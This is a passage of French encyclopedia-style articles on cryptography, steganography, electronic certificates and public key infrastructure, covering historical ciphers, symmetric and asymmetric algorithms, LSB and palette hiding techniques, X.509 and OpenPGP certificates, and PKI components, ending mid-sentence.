Histoire Article détaillé : Histoire de la cryptologie. Utilisé depuis l'antiquité, l'une des utilisations les plus célèbres pour cette époque est le chiffre de César, nommé en référence à Jules César qui l'utilisait pour ses communications secrètes. Mais la cryptographie est bien antérieure à cela : le plus ancien document chiffré est une recette secrète de poterie qui date du XVIe siècle av. J.-C., qui a été découverte dans l'actuelle Irak. Bien qu'éminemment stratégique, la cryptographie est restée pendant très longtemps un art, pour ne devenir une science qu'au XXIe siècle. Avec l'apparition de l'informatique, son utilisation se démocratise de plus en plus.

Utilisations Les domaines d'utilisations de la cryptographie sont très vastes et vont du domaine militaire, au commercial, en passant par la protection de la vie privée.

Algorithmes et protocoles Article connexe : Protocole de communication.

Algorithmes de chiffrement faibles (facilement cassables) Les premiers algorithmes utilisés pour le chiffrement d'une information étaient assez rudimentaires dans leur ensemble. Ils consistaient notamment au remplacement de caractères par d'autres. La confidentialité de l'algorithme de chiffrement était donc la pierre angulaire de ce système pour éviter un décryptage rapide. Exemples d'algorithmes de chiffrement faibles : • ROT13 (rotation de 13 caractères, sans clé) ; • Chiffre de César (décalage de trois lettres dans l'alphabet sur la gauche). • Chiffre de Vigenère (introduit la notion de clé)

Algorithmes de cryptographie symétrique (à clé secrète) Article détaillé : Cryptographie symétrique. Les algorithmes de chiffrement symétrique se fondent sur une même clé pour chiffrer et déchiffrer un message. L'un des problèmes de cette technique est que la clé, qui doit rester totalement confidentielle, doit être transmise au correspondant de façon sûre. La mise en œuvre peut s'avèrer difficile, surtout avec un grand nombre de correspondants car il faut autant de clés que de correspondants. Quelques algorithmes de chiffrement symétrique très utilisés : • Chiffre de Vernam (le seul offrant une sécurité théorique absolue, à condition que la clé ait au moins la même longueur que le message, qu'elle ne soit utilisée qu'une seule fois à chiffrer et qu'elle soit totalement aléatoire) •• DES •• 3DES •• AES •• RC4 •• RC5 •• MISTY1 • et d'autres (voir la liste plus exhaustive d'algorithmes de cryptographie symétrique). Cryptographie 278

Algorithmes de cryptographie asymétrique (à clé publique et privée) Article détaillé : Cryptographie asymétrique. Pour résoudre le problème de l'échange de clés, la cryptographie asymétrique a été mise au point dans les années 1970. Elle se base sur le principe de deux clés : •• une publique, permettant le chiffrement ; •• une privée, permettant le déchiffrement. Comme son nom l'indique, la clé publique est mise à la disposition de quiconque désire chiffrer un message. Ce dernier ne pourra être déchiffré qu'avec la clé privée, qui doit rester confidentielle. Quelques algorithmes de cryptographie asymétrique très utilisés : • RSA (chiffrement et signature); • DSA (signature); • Protocole d'échange de clés Diffie-Hellman (échange de clé); • et d'autres ; voir cette liste plus complète d'algorithmes de cryptographie asymétrique. Le principal inconvénient de RSA et des autres algorithmes à clés publiques est leur grande lenteur par rapport aux algorithmes à clés secrètes. RSA est par exemple 1000 fois plus lent que DES. En pratique, dans le cadre de la confidentialité, on s'en sert pour chiffrer un nombre aléatoire qui sert ensuite de clé secrète pour un algorithme de chiffrement symétrique. C'est le principe qu'utilisent des logiciels comme PGP par exemple. La cryptographie asymétrique est également utilisée pour assurer l'authenticité d'un message. L'empreinte du message est chiffrée à l'aide de la clé privée et est jointe au message. Les destinataires déchiffrent ensuite le cryptogramme à l'aide de la clé publique et retrouvent normalement l'empreinte. Cela leur assure que l'émetteur est bien l'auteur du message. On parle alors de signature ou encore de scellement.

Fonctions de hachage Article détaillé : Fonction de hachage. Une fonction de hachage est une fonction qui convertit un grand ensemble en un plus petit ensemble, l'empreinte. Il est impossible de la déchiffrer pour revenir à l'ensemble d'origine, ce n'est donc pas une technique de chiffrement. Quelques fonctions de hachage très utilisées : • MD5 ; • SHA-1 ; • SHA-256 ; • et d'autres ; voir cette liste plus complète d'algorithmes de hachage. L'empreinte d'un message ne dépasse généralement pas 256 bits (maximum 512 bits pour SHA-512) et permet de vérifier son intégrité. Cryptographie 279

Communauté •• Projet NESSIE •• Advanced Encryption Standard process • Les cryptologues sont des experts en cryptologie : ils conçoivent, analysent et cassent les algorithmes (voir cette liste de cryptologues).

Notes et références

[1] Ricardo Caferra in Logique pour l'informatique et pour l'intelligence artificielle, p. 196, ISBN 978-2-7462-2600-5 [2][2]Ainsi si vous faites des efforts pour arriver à lire ce qu'a écrit votre médecin, vous déchiffrez son écriture (vous connaissez le chiffre puisque le message est rédigé en français) ; en revanche, si vous vous attaquez à la lecture de tablettes sumériennes dont la signification de l'écriture s'est à jamais perdue, vous décryptez un message, il vous faut auparavant casser le chiffre.

Stéganographie

Cet article concerne les techniques de dissimulation d'information. Pour l'écriture abrégée, voir Sténographie. Si la cryptographie est l'« art du secret », la stéganographie est l'art de la dissimulation : l'objet de la stéganographie est de faire passer inaperçu un message dans un autre message et non de rendre un message inintelligible à autre que qui-de-droit. Pour prendre une métaphore, la stéganographie consisterait à enterrer son argent dans son jardin là où la cryptographie consisterait à l'enfermer dans un coffre-fort — cela dit, rien n'empêche de combiner les deux techniques, de même que l'on peut enterrer un coffre dans son jardin. C'est un mot issu du grec ancien στεγανός / steganós (« étanche ») et γραφή / graphế (« écriture »).

Histoire[1] Dans son Enquête, l'historien grec Hérodote (484-445 av. J.-C.) rapporte ainsi une anecdote qui eut lieu au moment de la seconde guerre médique. En 484 avant l'ère chrétienne, Xerxès Ier, fils de Darius, roi des Perses, décide de préparer une armée gigantesque pour envahir la Grèce (Livre VII, 5-19). Quatre ans plus tard, lorsqu'il lance l'offensive, les Grecs sont depuis longtemps au courant de ses intentions. C'est que Démarate, ancien roi de Sparte réfugié auprès de Xerxès, a appris l'existence de ce projet et décide de transmettre l'information à Sparte (Livre VII, 239) : « il prit une tablette double, en gratta la cire, puis écrivit sur le bois même les projets de Xerxès ; ensuite il recouvrit de cire son message : ainsi le porteur d'une tablette vierge ne risquait pas d'ennuis. » Un autre passage de la même œuvre fait également référence à la stéganographie : au paragraphe 35 du livre V, Histiée incite son gendre Aristagoras, gouverneur de Milet, à se révolter contre son roi, Darius, et pour ce faire, « il fit raser la tête de son esclave le plus fidèle, lui tatoua son message sur le crâne et attendit que les cheveux eussent repoussé ; quand la chevelure fut redevenue normale, il fit partir l'esclave pour Milet. » En Chine, on écrivait le message sur de la soie, qui ensuite était placée dans une petite boule recouverte de cire. Le messager avalait ensuite cette boule. Dès le Ier siècle av. J.-C., Pline l'Ancien décrit comment réaliser de l'encre invisible (ou « encre sympathique »). Les enfants de tous les pays s'amusent à le faire en écrivant avec du lait ou du jus de citron : le passage de la feuille écrite sous une source chaude (fer à repasser chaud, flamme de bougie...) révèle le message. Durant la Seconde Guerre mondiale, les agents allemands utilisaient la technique du micropoint de Zapp, qui consiste à réduire la photo d'une page en un point d'un millimètre ou même moins. Ce point est ensuite placé dans un texte normal. Le procédé est évoqué dans une aventure de Blake et Mortimer, S.O.S. Météores. Stéganographie 280

Un couple célèbre d'artistes de music-hall des années 1960, Myr et Myroska, communiquait les yeux bandés, en apparence par « transmission de pensée » et, en réalité, par un astucieux procédé stéganographique à base de phrases codées (dont, en particulier, des variantes de la phrase : « Myroska, êtes-vous avec moi ? »). Le principe alors utilisé est toujours largement repris aujourd'hui[réf. nécessaire].

Méthodes Supposons, pour notre exemple, que, durant la Seconde Guerre mondiale, une résistante, Alice, doive envoyer tous les jours le nombre de bateaux en rade de Marseille à son correspondant à Paris, Bob. Ils conviennent qu'Alice enverra tous les jours à Bob les prix moyens de divers fruits observés sur le marché de Marseille. Il faut, bien sûr, qu'un agent ennemi, Oscar, •• ne puisse découvrir le contenu caché, •• ne puisse même savoir qu'un contenu est caché, •• ne puisse empêcher la transmission d'un contenu caché éventuel, •• ne puisse envoyer une fausse information en se faisant passer pour Alice.

Création d'un contenu ad hoc Alice peut envoyer un message contenant :

Poires : 0 Cerises : 0 Pommes : 1 Tomates : 3 Courgettes : 2

Bob découvrira qu'il y a, ce jour-là, 132 bateaux. La technique informatique citée ci-dessous comme Codage sous forme d'une apparence de spam s'apparente à cette méthode. L'avantage de la méthode est qu'Alice pourra envoyer à Bob une information très longue. Toutefois, la méthode ne peut être utilisée qu'une seule fois car Oscar pourra rapidement se rendre compte du procédé.

Modifications mineures d'un contenu existant Alice peut envoyer un message contenant : Poires : 4.00 Cerises : 12.00 Pommes : 5.01 Tomates : 3.23 Courgettes : 10.02

Les techniques informatiques décrites ci-dessous dans les rubriques Usage des bits de poids faible d'une image (LSB) et Modulation fine d'un texte écrit correspondent à cette technique. L'avantage de la méthode est qu'Alice pourra envoyer à Bob une information relativement longue. Toutefois, Oscar pourrait comparer les prix transmis avec les prix réels (dans le cas du procédé LSB, faire une comparaison bit à bit), pourrait s'étonner d'une précision superflue, pourrait interdire une trop grande précision. (cf. plus bas : stérilisation) Stéganographie 281

Dissimulation dans un élément annexe au contenu Alice peut, le lundi, envoyer un message contenant :

*Poires : 4 *Cerises : 12 *Pommes : 5 *Tomates : 3 *Courgettes : 10

et, le mardi, dans un ordre différent (Alice étant fantasque), mais avec des prix parfaitement exacts : *Cerises : 12 *Poires : 3 *Tomates : 3 *Pommes : 6 *Courgettes : 10

Le contenu réel du message est dissimulé dans la variation de l'ordre des fruits par rapport à l'ordre de la veille. L'inconvénient de la méthode est que le message est relativement limité en taille. Si Alice se limite à 5 fruits, elle peut transmettre chaque jour à Bob une valeur comprise entre 1 et 120 (factorielle de 5). L'avantage réside dans la difficulté pour Oscar de repérer l'existence du procédé stéganographique. Une technique informatique correspondante consiste à maintenir une image intacte mais à y incorporer une table des couleurs ou palette construite dans un ordre qui paraît arbitraire. Le contenu caché peut être une clef donnant accès à un message plus long. En outre, le contenu doit normalement inclure un procédé (généralement un checksum) permettant de vérifier sa validité. L'image qui sert de vecteur à un contenu caché peut être un extrait d'une image connue mais ne peut jamais être sa reproduction exacte, au risque de permettre par comparaison de révéler l'utilisation d'une technique stéganographique.

Contre-mesures Cet art est à risque mesuré dans la mesure où il s'applique à l'information. Son point faible réside donc dans la transmission et la diffusion de cette information. Une société qui désire contrer l'usage de la stéganographie essayera d'empêcher, de modifier ou de détruire la transmission, la diffusion ou le message lui-même. Par exemple, en interdisant tous contenus arbitraires, abstraits, interprétables, nuancés, fantaisistes, fantasques, poétiques, etc. Elle imposera le respect de critères formels stricts. Ou, au contraire, s'efforcera, dans le secret, de stériliser toutes les informations (cf. paragraphe sur l'imagerie) à des points clés de la transmission des informations (offices postaux, …). Ce risque de manipulations est encore plus grand avec l'informatique dans la mesure où les interventions humaines sont moins nombreuses assurant ainsi la discrétion des mesures de coercition et les possibilités d'intervention plus grandes (piratage, cheval de Troie…). La destruction systématique de toute information ou des diffuseurs ou récepteurs est sans doute le plus vieux procédé dont la fiabilité n'est pas assurée (de par sa non-exhaustivité dans la pratique ; l'information étant humainement vitale). Dans l'exemple ci-dessus, elle supprimera l'usage de décimales, imposera un ordre alphabétique, interdira les messages dont le contenu ou la langue ne sont pas compris par un préposé, etc. De nos jours, la stéganographie peut être utilisée à deux fins distinctes : les communications humaines (humains à humains) et machines (machines à machines). Dans les deux cas de figure, il faut au strict minimum qu'il y ait deux parties : un émetteur et un receveur. Cependant, les deux peuvent ne pas se trouver dans le même « espace-temps ». Autrement dit, rien n'empêche de communiquer une information à un tiers n'existant pas encore. Il n'est donc pas Stéganographie 282

improbable de trouver des messages dissimulés jadis. La problématique des contre-mesures à adopter prend alors une toute autre dimension. La transmission de l'information étant naturelle et vitale à toute société humaine, il n'est pas envisageable de la détruire intégralement (d'où son efficacité limitée intrinsèquement). En revanche, dans le cas des communications machines, des moyens efficaces et terriblement dangereux existent (tels que le nucléaire via la destruction de tout dispositif électronique par ondes électromagnétiques…). Cette contre-mesure extrémiste mettrait à mal toute la société visée. La stéganographie peut être utilisée comme moyen de coercition dans le cadre de communications machines. Par exemple, les virus informatiques et certaines techniques de piratage peuvent en revêtir une forme. La technique du trojan en est également une. Si l'on occulte les possibilités extrémistes, le meilleur moyen coercitif reste la modification de toute information transmise entre humains ou machines par interventions discrètes ou radicales et non leur destruction.

Contre « contre-mesures » La coercition a l'inconvénient d'engendrer systématiquement des moyens de la contourner, et ce, sans fin envisageable (de par la nécessité de l'information). La redondance de l'information, des transmissions ou de la diffusion reste le moyen de lutte le plus simple. L'autre est de ne pas cacher l'information ou de la noyer. Par exemple, cacher de l'information inutile dans un message ouvert utile : le réflexe étant alors de se focaliser sur l'information cachée plutôt que d'admettre l'évidence du message en clair. Actuellement, à la vue de la quantité du flot continu d'informations qui inonde nos sociétés modernes, il est mathématiquement impossible d'empêcher l'utilisation de la stéganographie qui a l'avantage de pouvoir revêtir d'innombrables formes cumulatives.

Techniques rendues possibles par l'ordinateur

Message transporté dans une image

Usage des bits de poids faible d'une image

L'idée est de prendre un message et de le modifier de manière aussi discrète que possible afin d'y dissimuler l'information à transmettre. Le message original est le plus souvent une image. La technique de base --- dite LSB pour Least Significant Bit --- consiste à modifier le bit de poids faible des pixels codant l'image : une image numérique est une suite de points, que l'on appelle pixels, et dont on code la couleur à l'aide d'un triplet d'octets, par exemple pour une couleur RGB sur 24 bits. Chaque octet indique l'intensité de la couleur correspondante --- rouge, vert ou bleu (Red Green Blue) --- par un niveau parmi 256. Passer d'un niveau n au niveau immédiatement supérieur (n+1) ou inférieur (n-1) ne modifie que peu la teinte du pixel, or c'est ce que l'on fait en modifiant le bit de poids faible de l'octet. Image d'un arbre. En ne gardant que les 2 bits les plus significatifs de chaque composante de couleur, on obtient l'image suivante (après éclaircissement) Stéganographie 283

Exemple

Donnons un exemple, considérons l'image

Image d'un chat extraite de l'image précédente.

000 000 000 000 000 001

001 000 001 111 111 111

Chaque entrée de ce tableau représente un pixel couleur, nous avons donc une toute petite image 2×2. Chaque triplet de bits (0 ou 1) code la quantité de l'une des trois couleurs primaires du pixel (une image couleur aura dans presque tous les cas des groupes de 8 bits, appelés octets, mais on n'utilise que 3 bits pour clarifier l'exemple). Le bit le plus à droite de chaque triplet est le fameux bit de poids faible --- LSB. Si on souhaite cacher le message 111 111 101 111, l'image est modifiée de la façon suivante : le bit de poids faible du ie octet est mis à la valeur du ie bit du message ; ici on obtient :

001 001 001 001 001 001

001 000 001 111 111 111

D'autres techniques similaires sont possibles. Par exemple, l'encodage du message peut être basé sur le mode de colorisation TSL (Teinte Saturation Luminance) plutôt que RGB (Red Green Blue / Rouge Vert Bleu). Mais toutes ces techniques ont l'inconvénient d'entrainer une déformation - voire une perte - des informations de l'image et sont facilement détectables soit par comparaison avec l'image originelle, soit par analyse linéaire simple (de la parité par exemple !). Ces techniques de stéganographie très basiques s'appliquent tout particulièrement au format d'image BMP, format sans compression destructive, avec codage des pixels entrelacé sur 3 octets comme énoncé ci-dessus[2]. Réciproquement, tout procédé de compression-décompression d'images avec pertes ou de redimensionnement de l'image est susceptible de détruire un message stéganographique codé de ces façons. On parle alors de stérilisation. Un pays totalitaire pourrait stériliser à tout hasard toute image BMP entrant ou sortant de son territoire, moyennant les ressources techniques nécessaires. Stéganographie 284

Manipulation de la palette de couleurs d'une image Certains formats graphiques tels que GIF ou PNG permettent le stockage des couleurs de l'image par référence à une palette de couleurs insérée dans le même fichier. Ainsi, au lieu de stocker bleu, blanc, rouge dans une image du drapeau français, on trouve dans un format de fichier la description de l'objet la suite couleur1, couleur2, couleur3 ainsi qu'une palette qui définit que couleur1 est le bleu, couleur2 le blanc et couleur3 le rouge. La même image peut-être stockée de la façon suivante : couleur2, couleur3, couleur1 avec une palette qui définit que couleur2 est le bleu, couleur3 est le blanc et couleur1 est le rouge. Ces deux images sont visuellement identiques, mais le stockage de celles-ci est différent. Pour une image contenant 256 couleurs uniques dans sa palette, on a factorielle 256 (256!) façons de stocker cette image. En utilisant un code connu entre l'émetteur et le récepteur de l'image, on peut donc communiquer un message de petite taille (log2(256!)), un peu moins de 1 684 bits) caché dans la permutation des couleurs de la palette de l'image.

Message caché dans les choix de compression d'une image

Cet article ou cette section doit être recyclé. Une réorganisation et une clarification du contenu sont nécessaires. Discutez des points à améliorer en page de discussion.

Tout semble indiquer que l'on ne peut cacher un message dans un format d'image utilisant une compression avec perte. En réalité la plupart des programmes de stéganographie sérieux s'attaquent justement au format JPEG qui utilise ce type de compression. L'idée n'est pas de cacher une information dans les couleurs ou dans la palette (puisqu'il n'y en a pas) mais dans les choix de compression. En effet, tout algorithme de compression nécessite une succession de choix. Avec des algorithmes de compression tels que Zip ou Gzip, on peut choisir la puissance de compression. En consommant plus de temps calcul et/ou plus de mémoire pour les opérations intermédiaires, on peut obtenir de meilleurs résultats de compression. Ainsi deux fichiers compressés de tailles différentes peuvent être décompressés en deux fichiers identiques. La compression dans le format JPEG est double. La première compression consiste à découper l'image en blocs de 8 fois 8 pixels et de transformer ces carrés sous une forme mathématique simplifiée. Cette compression introduit des pertes et la version mathématique peut être légèrement différente du carré original tout en étant visuellement très semblable. Une fois tous les blocs compressés, il faut coder les formes mathématiques en consommant le moins possible d'espace. Cette deuxième compression n'introduit pas de perte et elle est similaire dans les principes à ce que l'on peut retrouver dans Zip ou Gzip. C'est en introduisant dans cette phase des bits d'informations que l'on arrive à transporter un message caché. Voir l'article détaillé: Tatouage numérique. Stéganographie 285

Message transporté dans un texte

Modulation fine d'un texte écrit Décaler une lettre de quelquẹs pixels ne pose aucun problème sur une imprimante à lạser et c'est pratiquement invisible à l'œil nu. En jouant sur les interlettrages d'un texte très long et à raison de deux valeurs d'espacement correspondant à 1 et 0, il est possible de transmettre un message sous forme papier, qui ne révèlera son vrai sens qu'ụne fois analysé par un scanner ayant une bonne précision. Historiquement, le procédé fut utilisé dès les années 1970 en utilisant non pas des imprimantes laser, mais des imprimantes à marguerite Diablo, qui permettaient de jouer sur l'espacement des caractères au 1/120e de pouce près.

Marquage de caractères Une technique similaire — mais plus facilement détectable — consiste à marquer certains caractères d'un document. Des points peuvent par exemple être placés sous les lettres d'un texte afin de dissimuler un message. Étalées sur un texte de plusieurs pages, ces marques peuvent s'avérer relativement efficaces vis-à-vis d'un œil non-averti. Un ordinateur n'est pas indispensable à la mise en œuvre de cette technique. En guise d'exemple, aviez-vous remarqué le message caché dans le premier paragraphe de la section Modulation fine d'un texte écrit ?

Codage sous forme d'une apparence de spam N'importe quel texte de spam peut servir de base à de la stéganographie, sur la base d'un codage binaire simple de quasi synonymes. Par exemple pactole = 1, fortune = 0 ; richesse = 1, aisance = 0 ; succès = 1, réussite = 0 ; etc. Des sites du Web proposent à titre de curiosité ce genre de codage et de décodage. Des textes écrits en langue de bois ou en style administratif se prêtent particulièrement bien à l'exercice.

Message transporté dans un son Dans les formats sonores, il existe à peu près les mêmes possibilités de cacher des messages que dans les images. Dans un fichier sonore au format MIDI, il n'existe pas de palette de couleurs mais bien différentes pistes qui peuvent être permutées. Dans un fichier sonore avec compression sans perte, on peut cacher de l'information dans des variations imperceptibles du son, les bits faiblement significatifs. Dans un fichier sonore avec compression avec perte, on peut cacher de l'information dans les choix de compression. Stéganographie 286

Autres possibilités Il est aussi possible de cacher des informations dans bien d'autres types de fichiers couramment échangés sur des réseaux telle la vidéo ou bien dans des textes (ce fut une des premières formes de la stéganographie) ou encore dans des zones d'un disque dur inutilisées par le système de fichiers. Des informations peuvent aussi être cachées sur d'autres supports que des supports informatiques.

Exemple

steganart

Usage La stéganographie est exploitable dans de nombreux domaines. Elle trouve ainsi comme application commerciale le watermarking (apposition de filigranes électroniques), technique permettant de « tatouer » un fichier électronique (pour y introduire notamment des informations utiles à la gestion des droits d'auteur). Il ne faut pas confondre le watermarking, par essence invisible, avec le fait que certains formats de fichiers offrent la possibilité d'inclure des méta-informations... Après les attentats du 11 septembre 2001, on a soupçonné Oussama Ben Laden de transmettre ses ordres en les cachant par des procédés stéganographiques dans des images transmises ou hébergées sur internet (ces suppositions n'ont jamais été étayées par des éléments concrets).[réf. nécessaire] Si la cryptographie, qui permet de protéger la vie privée et l'activité industrielle sans cacher cette protection, est souvent maltraitée par les États totalitaires et les sociétés démocratiques à tendance sécuritaire, il n'en va pas nécessairement de même pour la stéganographie, qui est pourtant une technique beaucoup mieux adaptée à une activité criminelle éventuelle. Stéganographie 287

Notes et références

[1] Voir frise historique (http:/ / campus. hesge. ch/ Daehne/ TD/ 2005/ DentandJenny. pdf), page 6.

[2] Exemple visuel de dissimulation d'une image dans une autre (http:/ / www. petitcolas. net/ fabien/ steganography/ image_downgrading/ 01. html) en utilisant la technique des bits de poids faible

• Portail de la cryptologie • Portail du renseignement • Portail de la sécurité de l’information Certificat électronique

Pour les articles homonymes, voir Certification. Un certificat électronique (aussi appelé certificat numérique ou certificat de clé publique) peut-être vu comme une carte d'identité numérique. Il est utilisé principalement pour identifier une entité physique ou morale, mais aussi pour chiffrer des échanges. Il est signé par un tiers de confiance qui atteste du lien entre l'identité physique et l'entité numérique (Virtuel). Le standard le plus utilisé pour la création des certificats numériques est le X.509.

Fonctionnement Le principe de fonctionnement des certificats électroniques est basé sur le chiffrement d'informations et sur la confiance. Pour cela, il existe deux méthodes de chiffrement :

Clés symétriques Cette méthode est la plus simple à comprendre : si Anne (A) veut envoyer un message chiffré à Bob (B) elle doit lui communiquer un mot de passe (Clé). Comme l'algorithme de chiffrement est symétrique, on a la relation suivante : TexteChiffré = Chiffrement (clé, texte)

Ainsi, Anne peut aussi déchiffrer un message en provenance de Bob avec la même clé. Mais il faut au préalable trouver un moyen sûr de transmettre la clé à l'abri des regards. La situation peut cependant devenir complexe, si Anne doit envoyer un message chiffré à Bob et à Charlie mais qu'elle ne souhaite pas donner la même clé à Charlie. Plus le nombre de personnes est grand, plus il est difficile de gérer les clés symétriques. D'autant qu'il faut au préalable trouver un moyen sûr de transmettre la clé à l'abri des regards. Certificat électronique 288

Clés asymétriques La propriété des algorithmes asymétriques est qu'un message chiffré par une clé publique n'est lisible que par le propriétaire de la clé privée correspondante. À l'inverse, un message chiffré par la clé privée sera lisible par tous ceux qui possèdent la clé publique. Ainsi avec sa clé privée, Anne : • signe ses messages. • lit (déchiffre) les messages qui lui sont adressés.

Certificat Un certificat électronique est un ensemble de données contenant : •• au moins une clé publique ; •• des informations d'identification, par exemple : noms, localisation, emails ; • au moins une signature ; de fait quand il n'y en a qu'une, l'entité signataire est la seule autorité permettant de prêter confiance (ou non) à l'exactitude des informations du certificat.

Serveur de clés

Les certificats sont stockés par des serveurs de clés, qui peuvent aussi faire office d'autorité d'enregistrement et de certification (repère A). Ils recensent et contrôlent les certificats. Ils possèdent souvent une liste (repère B) des certificats révoqués. Certificat électronique 289

Description des principaux certificats Les certificats électroniques respectent des standards spécifiant leur contenu de façon rigoureuse. Les deux formats les plus utilisés aujourd'hui sont : • X.509 dont plusieurs RFC définissent les propriétés et usages [citation nécessaire] ; • OpenPGP, défini dans la RFC 4880[1]. La différence notable entre ces deux formats est qu'un certificat X509 ne peut contenir qu'un seul identifiant, que cet identifiant doit contenir de nombreux champs prédéfinis, et ne peut être signé que par une seule autorité de certification. Un certificat OpenPGP peut contenir plusieurs identifiants, lesquels autorisent une certaine souplesse sur leur contenu, et peuvent être signés par une multitude d'autres certificats OpenPGP. Ce qui permet alors de construire des toiles de confiance. Les certificats électroniques et leurs cycles de vie (cf. Certificate Revocation List, Protocole de vérification en ligne de certificat) sont gérés au sein d'infrastructures à clés publiques.

Utilisation des certificats

Sécurité des systèmes d'information Les certificats électroniques peuvent être utilisés dans différentes applications informatiques dans le cadre de la sécurité des systèmes d'information pour garantir : • la non-répudiation et l'intégrité des données avec la signature numérique ou signature électronique (avancée) ; • la confidentialité des données grâce au chiffrement des données ; • l'authentification ou l'authentification forte d'un individu ou d'une identité non-physique (Web Serveur - SSL, Poste de travail - 802.1x, VPN IPSEC - SSH - SSL, Code Mobile, documents électroniques).

L'interopérabilité Dans certains cas, le certificat peut être associé à l'élément « identifiant » des registres de métadonnées (10e élément dans le Dublin Core) pour l'interopérabilité [2].

Certificats et navigation Internet Les certificats sont très largement utilisés sur les sites de e-commerce, webmails ou autres sites sensibles (banques, impôts, etc.) Plusieurs niveaux de chiffrement existent et plusieurs fonctionnalités associées rendent la compréhension des certificats complexe.

Certificats X.509 standards Ce sont les certificats classiques, qui existent depuis plusieurs années. Le chiffrement varie entre 40 bits et 256 bits. Cela est dû en partie à la capacité des navigateurs et à la législation en vigueur. Généralement, les sociétés éditrices de certificats proposent 40 bits ou 128 bits garantis.

Certificats X.509 étendus Ce sont les certificats qui sont pris en charge dans les navigateurs récents et qui permettent l'affichage d'un fond vert (indiquant ainsi un site de confiance garantie). L'abréviation EV signifie "Extended Validation". Certificat électronique 290

Certificats X.509 omnidomaines Un certificat omnidomaine ou "wildcard" permet de rendre générique une partie du nom de domaine certifié : *.societe.fr → www.societe.fr, toto.societe.fr, titi.societe.fr (mais ni "societe.fr", ni "www.toto.societe.fr". Cf RFC 2818[3])

Certificats X.509 multisites Ces certificats contiennent une liste de noms. Cette solution se base sur le champ subjectAltName. Dans le cas des serveurs web, ces certificats sont utiles pour fournir plusieurs sites HTTPS sur une seule adresse IP. En effet, en HTTPS, l'échange du certificat se fait avant que le navigateur client n'ait transmis le nom de domaine qui l'intéresse. Or, si le certificat fourni par le serveur ne contenait pas le nom requis par le client, celui-ci déclencherait une alerte de sécurité. Cf Server Name Indication pour une autre possibilité technique.

Certificats OpenPGP Alors que les premiers sites web "sécurisés" ne pouvaient utiliser que des certificats X.509, l'exploitation de la RFC 6091[4] permet désormais d'utiliser des certificats OpenPGP afin de faire du HTTPS.

Certificats et courriels L'utilisation des certificats pour chiffrer, ou signer des courriels se fait en utilisant le standard S/MIME qui permet l'encapsulation des données cryptographiques dans le format MIME des courriels. Lorsqu'un utilisateur est certifié, une icône permet généralement de le savoir :

Leur utilisation est controversée, car la signature est ajoutée comme élément supplémentaire au contenu du courriel. Par conséquent, l'utilisation de certificats sur des listes de diffusions peut résulter en l'invalidation de la signature, du fait des modifications effectuées par le moteur traitant la liste. De plus, de nombreuses messageries en ligne (ou « webmails ») et clients de messagerie ne gèrent pas le format S/MIME, ce qui perturbe parfois les utilisateurs voyant une pièce jointe « smime.p7m » apparaître dans leurs messages. Dans le cadre des messageries en ligne, une problématique supplémentaire est en cause, celle de la confiance dans l'opérateur. En effet, utiliser son certificat sur un webmail implique obligatoirement que le fournisseur de ce service partage les éléments secrets du certificat (clé privée et mot de passe), sans quoi il ne peut réaliser la signature, ou le chiffrement. Et cela implique qu'il doive aussi fournir un moteur de cryptographie. Certificat électronique 291

Références o [1] (en) Request for Comments n 4880 (http:/ / tools. ietf. org/ html/ rfc4880).

[2] Voir Dictionnaire de métadonnées (http:/ / artist. inist. fr/ IMG/ doc/ CnrsMetaV5. doc) pour le référentiel des publications CNRS. o [3] (en) Request for Comments n 2818 (http:/ / tools. ietf. org/ html/ rfc2818). o [4] (en) Request for Comments n 6091 (http:/ / tools. ietf. org/ html/ rfc6091).

Identité numérique

Cette page d’homonymie répertorie les différents sujets et articles partageant un même nom. __DISAMBIG__ L'identité numérique peut se référer à : • l'identité au sens logique (A = A) • l'identité numérique sur Internet (ou cyberidentité)

Infrastructure à clés publiques

Pour les articles homonymes, voir ICP, IGC et PKI. Une infrastructure à clés publiques (ICP) ou infrastructure de gestion de clés (IGC) ou encore Public Key Infrastructure (PKI), est un ensemble de composants physiques (des ordinateurs, des équipements cryptographiques logiciels ou matériel type HSM ou encore des cartes à puces), de procédures humaines (vérifications, validation) et de logiciels (système et application) en vue de gérer le cycle de vie des certificats numériques ou certificats électroniques. Une infrastructure à clés publiques délivre un ensemble de services pour le compte de ses utilisateurs. En résumé, ces services sont les suivants : •• enregistrement des utilisateurs (ou équipement informatique) ; •• génération de certificats ; •• renouvellement de certificats ; •• révocation de certificats ; •• publication de certificats ; •• publication des listes de révocation (comprenant la liste des certificats révoqués) ; •• identification et authentification des utilisateurs (administrateurs ou utilisateurs qui accèdent à l'ICP) ; •• archivage, séquestre et recouvrement des certificats (option).

Description de l'infrastructure à clés publiques

Rôle d'une infrastructure à clés publiques Une infrastructure à clés publiques (ICP) délivre des certificats numériques. Ces certificats permettent d'effectuer des opérations cryptographiques, comme le chiffrement et la signature numérique qui offrent les garanties suivantes lors des transactions électroniques : • confidentialité : seul le destinataire (ou le possesseur) légitime d'un bloc de données ou d'un message pourra en avoir une vision intelligible ; • authentification : lors de l'envoi d'un bloc de données ou d'un message ou lors de la connexion à un système, on connaît sûrement l'identité de l'émetteur ou l'identité de l'utilisateur qui s'est connecté ; Infrastructure à clés publiques 292

• intégrité : on a la garantie qu'un bloc de données ou un message expédié n'a pas été altéré, accidentellement ou intentionnellement ; • non-répudiation : l'auteur d'un bloc de données ou d'un message ne peut pas renier son œuvre. Les ICP permettent l'obtention de ces garanties par l'application de processus de vérification d'identité rigoureux et par la mise en œuvre de solutions cryptographiques fiables (éventuellement évaluées), conditions indispensables à la production et à la gestion des certificats électroniques.

Composants de l'infrastructure à clés publiques Les ICP (comme définies par l'IETF) se scindent en 4 entités distinctes : •L'autorité de certification (AC ou CA) qui a pour mission de signer les demandes de certificat (CSR : Certificate Signing Request) et de signer les listes de révocation (CRL : Certificate Revocation List). Cette autorité est la plus critique. •L'autorité d'enregistrement (AE ou RA) qui a pour mission de générer les certificats, et d'effectuer les vérifications d'usage sur l'identité de l'utilisateur final (les certificats numériques sont nominatifs et uniques pour l'ensemble de l'ICP). •L'autorité de dépôt (Repository) qui a pour mission de stocker les certificats numériques ainsi que les listes de révocation (CRL). •L'entité finale (EE : End Entity). L’utilisateur ou le système qui est le sujet d’un certificat (En général, le terme « entité d’extrémité » (EE) est préféré au terme « sujet » afin d’éviter la confusion avec le champ Subject). En complément, on pourra ajouter l'autorité de séquestre, qui n'est pas définie spécifiquement par l'IETF : •L'autorité de séquestre (Key Escrow), cette entité a un rôle particulier, en effet lorsqu'on génère des certificats de chiffrement, on a l'obligation légale [en France] de fournir aux autorités un moyen de déchiffrer les données chiffrées pour un utilisateur de l'ICP. C'est là qu'intervient le séquestre, 